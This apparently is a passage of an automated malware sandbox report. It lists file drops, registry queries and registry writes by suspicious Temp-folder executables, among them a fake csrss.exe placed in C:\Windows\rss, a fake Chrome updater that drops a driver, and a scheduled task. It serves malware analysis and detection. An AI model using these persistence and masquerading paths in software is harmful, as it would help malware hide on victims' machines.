File created C:\Program Files (x86)\MyBurn\Sounds\is-BS88N.tmp C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp N/A
File opened for modification C:\Program Files (x86)\MyBurn\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A
File created C:\Program Files (x86)\MyBurn\is-46UPJ.tmp C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-7AQ09.tmp C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp N/A
File created C:\Program Files (x86)\MyBurn\Sounds\is-4M76Q.tmp C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp N/A
File opened for modification C:\Program Files (x86)\MyBurn\MyBurn.exe C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Program Files (x86)\MyBurn\is-MIOMF.tmp C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune C:\Users\Admin\AppData\Local\Temp\C135.exe N/A
File created C:\Windows\Logs\CBS\CbsPersist_20231025045428.cab C:\Windows\system32\makecab.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\Tasks\bwpFiyeZPJPVdaMxTt.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zSDBEE.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zSDBEE.tmp\Install.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "404371473" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{5E7EC351-72F2-11EE-AA96-FAD03DFA5361} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 3051452fff06da01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d79072038c960342ab421b8facb933e900000000020000000000106600000001000020000000aa5b9f696d6d5fadb6817a257c6a3d0eca49a6716636fb7bf2c38cb484080a27000000000e8000000002000020000000868fd7d5982d340fd5acd890d1b6de0f55f4a1d62547f6d9ee509f476889464e90000000859600b860a5d568fa742b4f9be8c68b177187b395f88c5f01e9572b7e00f9f1e094efb57e22faf6b8dfd265ee27d9403944e16d7d2ab6e77c9bc67fcaf04ecab61f7f668bdbbe4ad0fdc7c0ac1c9263261724b8629cc08e935cb6e810d69893722a6a75fb8b88f3697776ae2e573207cb3cebbfbe3e7d45221b14b8b406deb57d139cdbc229d172653ce0cbf74590b440000000042b6c1fecacf22ddecc2efb9a629e667cc36ce571967fa26bd98085049221621d450844d920064dda52106eaf4440e7a59e1e227971db2a654383b7b1004747 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d79072038c960342ab421b8facb933e900000000020000000000106600000001000020000000367ee104ed536bb448f47b601ef76cf839da892c271190f56cc4fb3e867c3774000000000e800000000200002000000074398a88d02a4ad4016d8329eba7549175b9f80755f8e3785ed798daea38fc42200000003e96ed12466fd7ad49d843b48c98cd346a6a94772812af09f8f10f5655181fe7400000004ed862f05009a332b5941bdc06d835dcd3a32d4098bcd177bb086f1523c153cc6fe0d45080e74eddfc1ed0769f89782ec292bcf8164cfe582bf8cd82042ffcc6 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
